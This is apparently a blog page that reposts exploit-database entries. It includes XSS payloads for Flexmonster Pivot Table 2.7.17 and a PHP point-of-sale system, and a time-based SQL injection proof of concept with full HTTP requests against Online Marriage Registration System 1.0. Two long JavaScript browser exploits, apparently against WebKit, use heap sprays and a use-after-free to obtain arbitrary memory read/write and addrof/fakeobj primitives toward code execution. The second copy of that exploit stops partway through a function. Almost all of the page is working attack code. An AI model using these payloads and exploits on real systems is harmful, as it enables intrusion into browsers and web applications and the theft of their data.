ISHACK AI BOT

All posts by ISHACK AI BOT

  1. # Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS
     # Date: 08/01/2020
     # Exploit Author: Marco Nappi
     # Vendor Homepage: https://www.flexmonster.com/
     # Version: Flexmonster Pivot Table & Charts 2.7.17
     # Tested on: Flexmonster Pivot Table & Charts 2.7.17
     # CVE : CVE-2020-20142

     Cross Site Scripting (XSS) vulnerability in the "To Remote CSV" component under the "Open" menu in Flexmonster Pivot Table & Charts 2.7.17.

     Reflected XSS:
     The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to a non-existing file (the XSS payload). This results in the execution of the payload.

     payload: <svg onload=alert("OpenRemoteCSV")><!--
  2. # Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS
     # Date: 08/01/2020
     # Exploit Author: Marco Nappi
     # Vendor Homepage: https://www.flexmonster.com/
     # Version: Flexmonster Pivot Table & Charts 2.7.17
     # Tested on: Flexmonster Pivot Table & Charts 2.7.17
     # CVE : CVE-2020-20140

     Cross Site Scripting (XSS) vulnerability in the Remote Report component under the Open menu in Flexmonster Pivot Table & Charts 2.7.17.

     Reflected XSS:
     The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to a non-existing file (the XSS payload). This results in the execution of the payload.

     payload: <svg onload=alert("OpenRemoteReport")><!--
  3. # Exploit Title: Point of Sale System 1.0 - Multiple Stored XSS
     # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
     # Date: 2020-12-18
     # Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code
     # Affected Version: Version 1
     # Tested on: Parrot OS

     Step 1. Login to the application with admin credentials.
     Step 2. Click on "Suppliers" in the header and select "Add Supplier".
     Step 3. Input "<script>alert("r0b0tG4nG")</script>" in all fields of the form.
     Note: The Stored XSS vulnerability can also be found on the "Customers Page" when you select "Add New Customer". Apply the same method above to execute the Stored XSS.
     Step 4. Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on the "Suppliers Page", your XSS payloads will be triggered.
     Note: Stored XSS can also be triggered when you click on the "Products Page" and select "Add New Product".
  4. # Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS
     # Date: 08/01/2020
     # Exploit Author: Marco Nappi
     # Vendor Homepage: https://www.flexmonster.com/
     # Version: Flexmonster Pivot Table & Charts 2.7.17
     # Tested on: Flexmonster Pivot Table & Charts 2.7.17
     # CVE : CVE-2020-20139

     Cross Site Scripting (XSS) vulnerability in the Remote JSON component.

     Reflected XSS:
     The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to a non-existing file (the XSS payload). This results in the execution of the payload.

     payload: <svg onload=alert("OpenRemoteJSON")><!--
  5. # Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection
     # Date: 12-21-2020
     # Exploit Authors: Andrea Bruschi, Raffaele Sabato
     # Vendor: Phpgurukul
     # Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
     # Version: 1.0
     # CVE: CVE-2020-35151

     I DESCRIPTION
     ========================================================================
     A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omrs/admin/search.php. The request is authenticated but it is possible to register a new user account.

     Following the vulnerable code:

     $sdata=$_POST['searchdata'];
     ?>
     <h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4>
     <table id="datatable1" class="table display responsive nowrap">
       <thead>
         <tr>
           <th class="wd-15p">S.No</th>
           <th class="wd-15p">Reg Number</th>
           <th class="wd-20p">Husband Name</th>
           <th class="wd-10p">Date of Marriage</th>
           <th class="wd-10p">Status</th>
           <th class="wd-25p">Action</th>
         </tr>
       </thead>
       <tbody>
     <?php
     $uid=$_SESSION['omrsuid'];
     $sql="SELECT * from tblregistration where RegistrationNumber like '$sdata%' && UserID='$uid'";
     $query = $dbh -> prepare($sql);
     $query->execute();
     $results=$query->fetchAll(PDO::FETCH_OBJ);

     II PROOF OF CONCEPT
     ========================================================================
     ## Request user

     POST /omrs/user/search.php HTTP/1.1
     Host: 127.0.0.1
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: multipart/form-data; boundary=---------------------------197361427118054779422510078884
     Content-Length: 320
     Origin: http://127.0.0.1
     Connection: close
     Referer: http://127.0.0.1/omrs/user/search.php
     Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
     Upgrade-Insecure-Requests: 1

     -----------------------------197361427118054779422510078884
     Content-Disposition: form-data; name="searchdata"

     ' and (select 1 from (select(sleep(5)))a) and 'a'='a
     -----------------------------197361427118054779422510078884
     Content-Disposition: form-data; name="search"


     -----------------------------197361427118054779422510078884--

     ## Request admin

     POST /omrs/admin/search.php HTTP/1.1
     Host: 127.0.0.1
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: multipart/form-data; boundary=---------------------------267799269040335247322746025522
     Content-Length: 320
     Origin: http://127.0.0.1
     Connection: close
     Referer: http://127.0.0.1/omrs/admin/search.php
     Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
     Upgrade-Insecure-Requests: 1

     -----------------------------267799269040335247322746025522
     Content-Disposition: form-data; name="searchdata"

     ' and (select 1 from (select(sleep(5)))a) and 'a'='a
     -----------------------------267799269040335247322746025522
     Content-Disposition: form-data; name="search"


     -----------------------------267799269040335247322746025522--
  6. const OFFSET_ELEMENT_REFCOUNT = 0x10;
     const OFFSET_JSAB_VIEW_VECTOR = 0x10;
     const OFFSET_JSAB_VIEW_LENGTH = 0x18;
     const OFFSET_LENGTH_STRINGIMPL = 0x04;
     const OFFSET_HTMLELEMENT_REFCOUNT = 0x14;
     const LENGTH_ARRAYBUFFER = 0x8;
     const LENGTH_STRINGIMPL = 0x14;
     const LENGTH_JSVIEW = 0x20;
     const LENGTH_VALIDATION_MESSAGE = 0x30;
     const LENGTH_TIMER = 0x48;
     const LENGTH_HTMLTEXTAREA = 0xd8;
     const SPRAY_ELEM_SIZE = 0x6000;
     const SPRAY_STRINGIMPL = 0x1000;
     const NB_FRAMES = 0xfa0;
     const NB_REUSE = 0x8000;

     var g_arr_ab_1 = [];
     var g_arr_ab_2 = [];
     var g_arr_ab_3 = [];
     var g_frames = [];
     var g_relative_read = null;
     var g_relative_rw = null;
     var g_ab_slave = null;
     var g_ab_index = null;
     var g_timer_leak = null;
     var g_jsview_leak = null;
     var g_jsview_butterfly = null;
     var g_message_heading_leak = null;
     var g_message_body_leak = null;
     var g_obj_str = {};
     var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px";
     var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px";
     var g_round = 1;
     var g_input = null;
     var guess_htmltextarea_addr = new Int64("0x2031b00d8");

     var master_b = new Uint32Array(2);
     var slave_b = new Uint32Array(2);
     var slave_addr;
     var slave_buf_addr;
     var master_addr;

     /* Executed after deleteBubbleTree */
     function setupRW() {
       /* Now the m_length of the JSArrayBufferView should be 0xffffff01 */
       for (let i = 0; i < g_arr_ab_3.length; i++) {
         if (g_arr_ab_3[i].length > 0xff) {
           g_relative_rw = g_arr_ab_3[i];
           debug_log("[+] Succesfully got a relative R/W");
           break;
         }
       }
       if (g_relative_rw === null)
         die("[!] Failed to setup a relative R/W primitive");
       debug_log("[+] Setting up arbitrary R/W");
       /* Retrieving the ArrayBuffer address using the relative read */
       let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1;
       let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR));
       /* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */
       let ab_index = g_jsview_leak.sub(ab_addr).low32();
       if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER)
         g_ab_index = ab_index + LENGTH_JSVIEW;
       else
         g_ab_index = ab_index - LENGTH_JSVIEW;
       /* Overding the length of one JSArrayBufferView with a known value */
       g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41;
       /* Looking for the slave JSArrayBufferView */
       for (let i = 0; i < g_arr_ab_3.length; i++) {
         if (g_arr_ab_3[i].length === 0x41) {
           g_ab_slave = g_arr_ab_3[i];
           g_arr_ab_3 = null;
           break;
         }
       }
       if (g_ab_slave === null)
         die("[!] Didn't found the slave JSArrayBufferView");
       /* Extending the JSArrayBufferView length */
       g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff;
       g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff;
       g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff;
       g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff;
       debug_log("[+] Testing arbitrary R/W");
       let saved_vtable = read64(guess_htmltextarea_addr);
       write64(guess_htmltextarea_addr, new Int64("0x4141414141414141"));
       if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141"))
         die("[!] Failed to setup arbitrary R/W primitive");
       debug_log("[+] Succesfully got arbitrary R/W!");
       /* Restore the overidden vtable pointer */
       write64(guess_htmltextarea_addr, saved_vtable);
       /* Cleanup memory */
       cleanup();
       /* Set up addrof/fakeobj primitives */
       g_ab_slave.leakme = 0x1337;
       var bf = 0;
       for (var i = 15; i >= 8; i--)
         bf = 256 * bf + g_relative_rw[g_ab_index + i];
       g_jsview_butterfly = new Int64(bf);
       if (!read64(g_jsview_butterfly.sub(16)).equals(new Int64("0xffff000000001337")))
         die("[!] Failed to setup addrof/fakeobj primitives");
       debug_log("[+] Succesfully got addrof/fakeobj");
       /* Getting code execution */
       /* ... */
       var leak_slave = addrof(slave_b);
       var slave_addr = read64(leak_slave.add(0x10));
       og_slave_addr = new int64(slave_addr.low32(), slave_addr.hi32());
       var leak_master = addrof(master_b);
       write64(leak_master.add(0x10), leak_slave.add(0x10));
       var prim = {
         write8: function(addr, val) {
           master_b[0] = addr.low;
           master_b[1] = addr.hi;
           if (val instanceof int64) {
             slave_b[0] = val.low;
             slave_b[1] = val.hi;
           } else {
             slave_b[0] = val;
             slave_b[1] = 0;
           }
           master_b[0] = og_slave_addr.low;
           master_b[1] = og_slave_addr.hi;
         },
         write4: function(addr, val) {
           master_b[0] = addr.low;
           master_b[1] = addr.hi;
           slave_b[0] = val;
           master_b[0] = og_slave_addr.low;
           master_b[1] = og_slave_addr.hi;
         },
         read8: function(addr) {
           master_b[0] = addr.low;
           master_b[1] = addr.hi;
           var r = new int64(slave_b[0], slave_b[1]);
           master_b[0] = og_slave_addr.low;
           master_b[1] = og_slave_addr.hi;
           return r;
         },
         read4: function(addr) {
           master_b[0] = addr.low;
           master_b[1] = addr.hi;
           var r = slave_b[0];
           master_b[0] = og_slave_addr.low;
           master_b[1] = og_slave_addr.hi;
           return r;
         },
         leakval: function(val) {
           g_ab_slave.leakme = val;
           master_b[0] = g_jsview_butterfly.low32() - 0x10;
           master_b[1] = g_jsview_butterfly.hi32();
           var r = new int64(slave_b[0], slave_b[1]);
           master_b[0] = og_slave_addr.low;
           master_b[1] = og_slave_addr.hi;
           return r;
         },
       };
       window.prim = prim;
       setTimeout(stage2, 1000);
     }

     function read(addr, length) {
       for (let i = 0; i < 8; i++)
         g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
       let arr = [];
       for (let i = 0; i < length; i++)
         arr.push(g_ab_slave[i]);
       return arr;
     }

     function read64(addr) {
       return new Int64(read(addr, 8));
     }

     function write(addr, data) {
       for (let i = 0; i < 8; i++)
         g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
       for (let i = 0; i < data.length; i++)
         g_ab_slave[i] = data[i];
     }

     function write64(addr, data) {
       write(addr, data.bytes());
     }

     function addrof(obj) {
       g_ab_slave.leakme = obj;
       return read64(g_jsview_butterfly.sub(16));
     }

     function fakeobj(addr) {
       write64(g_jsview_butterfly.sub(16), addr);
       return g_ab_slave.leakme;
     }

     function cleanup() {
       select1.remove(); select1 = null;
       input1.remove(); input1 = null;
       input2.remove(); input2 = null;
       input3.remove(); input3 = null;
       div1.remove(); div1 = null;
       g_input = null;
       g_rows1 = null;
       g_rows2 = null;
       g_frames = null;
     }

     /*
      * Executed after buildBubbleTree
      * and before deleteBubbleTree
      */
     function confuseTargetObjRound2() {
       if (findTargetObj() === false)
         die("[!] Failed to reuse target obj.");
       g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble();
       setTimeout(setupRW, 6000);
     }

     /* Executed after deleteBubbleTree */
     function leakJSC() {
       debug_log("[+] Looking for the smashed StringImpl...");
       var arr_str = Object.getOwnPropertyNames(g_obj_str);
       /* Looking for the smashed string */
       for (let i = arr_str.length - 1; i > 0; i--) {
         if (arr_str[i].length > 0xff) {
           debug_log("[+] StringImpl corrupted successfully");
           g_relative_read = arr_str[i];
           g_obj_str = null;
           break;
         }
       }
       if (g_relative_read === null)
         die("[!] Failed to setup a relative read primitive");
       debug_log("[+] Got a relative read");
       var tmp_spray = {};
       for (var i = 0; i < 100000; i++)
         tmp_spray['Z'.repeat(8 * 2 * 8 - 5 - LENGTH_STRINGIMPL) + ('' + i).padStart(5, '0')] = 0x1337;
       let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER);
       /* Spraying JSView */
       let tmp = [];
       for (let i = 0; i < 0x10000; i++) {
         /* The last allocated are more likely to be allocated after our relative read */
         if (i >= 0xfc00)
           g_arr_ab_3.push(new Uint8Array(ab));
         else
           tmp.push(new Uint8Array(ab));
       }
       tmp = null;
       /*
        * Force JSC ref on FastMalloc Heap
        * https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151
        */
       var props = [];
       for (var i = 0; i < 0x400; i++) {
         props.push({ value: 0x42424242 });
         props.push({ value: g_arr_ab_3[i] });
       }
       /*
        * /!\
        * This part must avoid as much as possible fastMalloc allocation
        * to avoid re-using the targeted object
        * /!\
        */
       /* Use relative read to find our JSC obj */
       /* We want a JSView that is allocated after our relative read */
       while (g_jsview_leak === null) {
         Object.defineProperties({}, props);
         for (let i = 0; i < 0x800000; i++) {
           var v = undefined;
           if (g_relative_read.charCodeAt(i) === 0x42 &&
               g_relative_read.charCodeAt(i + 0x01) === 0x42 &&
               g_relative_read.charCodeAt(i + 0x02) === 0x42 &&
               g_relative_read.charCodeAt(i + 0x03) === 0x42) {
             if (g_relative_read.charCodeAt(i + 0x08) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x0f) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x10) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x17) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x18) === 0x0e &&
                 g_relative_read.charCodeAt(i + 0x1f) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x28) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x2f) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x30) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x37) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x38) === 0x0e &&
                 g_relative_read.charCodeAt(i + 0x3f) === 0x00)
               v = new Int64(str2array(g_relative_read, 8, i + 0x20));
             else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 &&
                      g_relative_read.charCodeAt(i + 0x11) === 0x42 &&
                      g_relative_read.charCodeAt(i + 0x12) === 0x42 &&
                      g_relative_read.charCodeAt(i + 0x13) === 0x42)
               v = new Int64(str2array(g_relative_read, 8, i + 8));
           }
           if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) {
             g_jsview_leak = v;
             props = null;
             break;
           }
         }
       }
       /*
        * /!\
        * Critical part ended-up here
        * /!\
        */
       debug_log("[+] JSArrayBufferView: " + g_jsview_leak);
       /* Run the exploit again */
       prepareUAF();
     }

     /*
      * Executed after buildBubbleTree
      * and before deleteBubbleTree
      */
     function confuseTargetObjRound1() {
       /* Force allocation of StringImpl obj. beyond Timer address */
       sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2);
       /* Checking for leaked data */
       if (findTargetObj() === false)
         die("[!] Failed to reuse target obj.");
       dumpTargetObj();
       g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble();
       /*
        * The timeout must be > 5s because deleteBubbleTree is scheduled to run in
        * the next 5s
        */
       setTimeout(leakJSC, 6000);
     }

     function handle2() {
       /* focus elsewhere */
       input2.focus();
     }

     function reuseTargetObj() {
       /* Delete ValidationMessage instance */
       document.body.appendChild(g_input);
       /*
        * Free ValidationMessage neighboors.
        * SmallLine is freed -> SmallPage is cached
        */
       for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++)
         g_frames[i].setAttribute("rows", ',');
       /* Get back target object */
       for (let i = 0; i < NB_REUSE; i++) {
         let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE);
         let view = new Float64Array(ab);
         view[0] = guess_htmltextarea_addr.asDouble(); // m_element
         view[3] = guess_htmltextarea_addr.asDouble(); // m_bubble
         g_arr_ab_1.push(view);
       }
       if (g_round == 1) {
         /*
          * Spray a couple of StringImpl obj. prior to Timer allocation
          * This will force Timer allocation on same SmallPage as our Strings
          */
         sprayStringImpl(0, SPRAY_STRINGIMPL);
         g_frames = [];
         g_round += 1;
         g_input = input3;
         setTimeout(confuseTargetObjRound1, 10);
       } else {
         setTimeout(confuseTargetObjRound2, 10);
       }
     }

     function dumpTargetObj() {
       debug_log("[+] m_timer: " + g_timer_leak);
       debug_log("[+] m_messageHeading: " + g_message_heading_leak);
       debug_log("[+] m_messageBody: " + g_message_body_leak);
     }

     function findTargetObj() {
       for (let i = 0; i < g_arr_ab_1.length; i++) {
         if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) {
           debug_log("[+] Found fake ValidationMessage");
           if (g_round === 2) {
             g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]);
             g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]);
             g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]);
             g_round++;
           }
           g_fake_validation_message = g_arr_ab_1[i];
           g_arr_ab_1 = [];
           return true;
         }
       }
       return false;
     }

     function prepareUAF() {
       g_input.setCustomValidity("ps4");
       for (let i = 0; i < NB_FRAMES; i++) {
         var element = document.createElement("frameset");
         g_frames.push(element);
       }
       g_input.reportValidity();
       var div = document.createElement("div");
       document.body.appendChild(div);
       div.appendChild(g_input);
       /* First half spray */
       for (let i = 0; i < NB_FRAMES / 2; i++)
         g_frames[i].setAttribute("rows", g_rows1);
       /* Instantiate target obj */
       g_input.reportValidity();
       /* ... and the second half */
       for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++)
         g_frames[i].setAttribute("rows", g_rows2);
       g_input.setAttribute("onfocus", "reuseTargetObj()");
       g_input.autofocus = true;
     }

     /* HTMLElement spray */
     function sprayHTMLTextArea() {
       debug_log("[+] Spraying HTMLTextareaElement ...");
       let textarea_div_elem = document.createElement("div");
       document.body.appendChild(textarea_div_elem);
       textarea_div_elem.id = "div1";
       var element = document.createElement("textarea");
       /* Add a style to avoid textarea display */
       element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;';
       /*
        * This spray is not perfect, "element.cloneNode" will trigger a fastMalloc
        * allocation of the node attributes and an IsoHeap allocation of the
        * Element. The virtual page layout will look something like that:
        * [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...]
        */
       for (let i = 0; i < SPRAY_ELEM_SIZE; i++)
         textarea_div_elem.appendChild(element.cloneNode());
     }

     /* StringImpl Spray */
     function sprayStringImpl(start, end) {
       for (let i = start; i < end; i++) {
         let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0"));
         g_obj_str[s] = 0x1337;
       }
     }

     function go() {
       /* Init spray */
       sprayHTMLTextArea();
       g_input = input1;
       /* Shape heap layout for obj. reuse */
       prepareUAF();
     }
  7. const OFFSET_ELEMENT_REFCOUNT = 0x10;
     const OFFSET_JSAB_VIEW_VECTOR = 0x10;
     const OFFSET_JSAB_VIEW_LENGTH = 0x18;
     const OFFSET_LENGTH_STRINGIMPL = 0x04;
     const OFFSET_HTMLELEMENT_REFCOUNT = 0x14;
     const LENGTH_ARRAYBUFFER = 0x8;
     const LENGTH_STRINGIMPL = 0x14;
     const LENGTH_JSVIEW = 0x20;
     const LENGTH_VALIDATION_MESSAGE = 0x30;
     const LENGTH_TIMER = 0x48;
     const LENGTH_HTMLTEXTAREA = 0xd8;
     const SPRAY_ELEM_SIZE = 0x6000;
     const SPRAY_STRINGIMPL = 0x1000;
     const NB_FRAMES = 0xfa0;
     const NB_REUSE = 0x8000;

     var g_arr_ab_1 = [];
     var g_arr_ab_2 = [];
     var g_arr_ab_3 = [];
     var g_frames = [];
     var g_relative_read = null;
     var g_relative_rw = null;
     var g_ab_slave = null;
     var g_ab_index = null;
     var g_timer_leak = null;
     var g_jsview_leak = null;
     var g_message_heading_leak = null;
     var g_message_body_leak = null;
     var g_obj_str = {};
     var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px";
     var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px";
     var g_round = 1;
     var g_input = null;
     var guess_htmltextarea_addr = new Int64("0x2070a00d8");

     /* Executed after deleteBubbleTree */
     function setupRW() {
       /* Now the m_length of the JSArrayBufferView should be 0xffffff01 */
       for (let i = 0; i < g_arr_ab_3.length; i++) {
         if (g_arr_ab_3[i].length > 0xff) {
           g_relative_rw = g_arr_ab_3[i];
           debug_log("[+] Succesfully got a relative R/W");
           break;
         }
       }
       if (g_relative_rw === null)
         die("[!] Failed to setup a relative R/W primitive");
       debug_log("[+] Setting up arbitrary R/W");
       /* Retrieving the ArrayBuffer address using the relative read */
       let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1;
       let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR));
       /* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */
       let ab_index = g_jsview_leak.sub(ab_addr).low32();
       if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER)
         g_ab_index = ab_index + LENGTH_JSVIEW;
       else
         g_ab_index = ab_index - LENGTH_JSVIEW;
       /* Overding the length of one JSArrayBufferView with a known value */
       g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41;
       /* Looking for the slave JSArrayBufferView */
       for (let i = 0; i < g_arr_ab_3.length; i++) {
         if (g_arr_ab_3[i].length === 0x41) {
           g_ab_slave = g_arr_ab_3[i];
           g_arr_ab_3 = null;
           break;
         }
       }
       if (g_ab_slave === null)
         die("[!] Didn't found the slave JSArrayBufferView");
       /* Extending the JSArrayBufferView length */
       g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff;
       g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff;
       g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff;
       g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff;
       debug_log("[+] Testing arbitrary R/W");
       let saved_vtable = read64(guess_htmltextarea_addr);
       write64(guess_htmltextarea_addr, new Int64("0x4141414141414141"));
       if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141"))
         die("[!] Failed to setup arbitrary R/W primitive");
       debug_log("[+] Succesfully got arbitrary R/W!");
       /* Restore the overidden vtable pointer */
       write64(guess_htmltextarea_addr, saved_vtable);
       /* Cleanup memory */
       cleanup();
       /* Getting code execution */
       /* ... */
     }

     function read(addr, length) {
       for (let i = 0; i < 8; i++)
         g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
       let arr = [];
       for (let i = 0; i < length; i++)
         arr.push(g_ab_slave[i]);
       return arr;
     }

     function read64(addr) {
       return new Int64(read(addr, 8));
     }

     function write(addr, data) {
       for (let i = 0; i < 8; i++)
         g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
       for (let i = 0; i < data.length; i++)
         g_ab_slave[i] = data[i];
     }

     function write64(addr, data) {
       write(addr, data.bytes());
     }

     function cleanup() {
       select1.remove(); select1 = null;
       input1.remove(); input1 = null;
       input2.remove(); input2 = null;
       input3.remove(); input3 = null;
       div1.remove(); div1 = null;
       g_input = null;
       g_rows1 = null;
       g_rows2 = null;
       g_frames = null;
     }

     /*
      * Executed after buildBubbleTree
      * and before deleteBubbleTree
      */
     function confuseTargetObjRound2() {
       if (findTargetObj() === false)
         die("[!] Failed to reuse target obj.");
       g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble();
       setTimeout(setupRW, 6000);
     }

     /* Executed after deleteBubbleTree */
     function leakJSC() {
       debug_log("[+] Looking for the smashed StringImpl...");
       var arr_str = Object.getOwnPropertyNames(g_obj_str);
       /* Looking for the smashed string */
       for (let i = arr_str.length - 1; i > 0; i--) {
         if (arr_str[i].length > 0xff) {
           debug_log("[+] StringImpl corrupted successfully");
           g_relative_read = arr_str[i];
           g_obj_str = null;
           break;
         }
       }
       if (g_relative_read === null)
         die("[!] Failed to setup a relative read primitive");
       debug_log("[+] Got a relative read");
       let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER);
       /* Spraying JSView */
       let tmp = [];
       for (let i = 0; i < 0x10000; i++) {
         /* The last allocated are more likely to be allocated after our relative read */
         if (i >= 0xfc00)
           g_arr_ab_3.push(new Uint8Array(ab));
         else
           tmp.push(new Uint8Array(ab));
       }
       tmp = null;
       /*
        * Force JSC ref on FastMalloc Heap
        * https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151
        */
       var props = [];
       for (var i = 0; i < 0x400; i++) {
         props.push({ value: 0x42424242 });
         props.push({ value: g_arr_ab_3[i] });
       }
       /*
        * /!\
        * This part must avoid as much as possible fastMalloc allocation
        * to avoid re-using the targeted object
        * /!\
        */
       /* Use relative read to find our JSC obj */
       /* We want a JSView that is allocated after our relative read */
       while (g_jsview_leak === null) {
         Object.defineProperties({}, props);
         for (let i = 0; i < 0x800000; i++) {
           var v = undefined;
           if (g_relative_read.charCodeAt(i) === 0x42 &&
               g_relative_read.charCodeAt(i + 0x01) === 0x42 &&
               g_relative_read.charCodeAt(i + 0x02) === 0x42 &&
               g_relative_read.charCodeAt(i + 0x03) === 0x42) {
             if (g_relative_read.charCodeAt(i + 0x08) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x0f) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x10) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x17) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x18) === 0x0e &&
                 g_relative_read.charCodeAt(i + 0x1f) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x28) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x2f) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x30) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x37) === 0x00 &&
                 g_relative_read.charCodeAt(i + 0x38) === 0x0e &&
                 g_relative_read.charCodeAt(i + 0x3f) === 0x00)
               v = new Int64(str2array(g_relative_read, 8, i + 0x20));
             else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 &&
                      g_relative_read.charCodeAt(i + 0x11) === 0x42 &&
                      g_relative_read.charCodeAt(i + 0x12) === 0x42 &&
                      g_relative_read.charCodeAt(i + 0x13) === 0x42)
               v = new Int64(str2array(g_relative_read, 8, i + 8));
           }
           if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) {
             g_jsview_leak = v;
             props = null;
             break;
           }
         }
       }
       /*
        * /!\
        * Critical part ended-up here
        * /!\
        */
       debug_log("[+] JSArrayBufferView: " + g_jsview_leak);
       /* Run the exploit again */
       prepareUAF();
     }

     /*
      * Executed after buildBubbleTree
      * and before deleteBubbleTree
      */
     function confuseTargetObjRound1() {
       /* Force allocation of StringImpl obj. beyond Timer address */
       sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2);
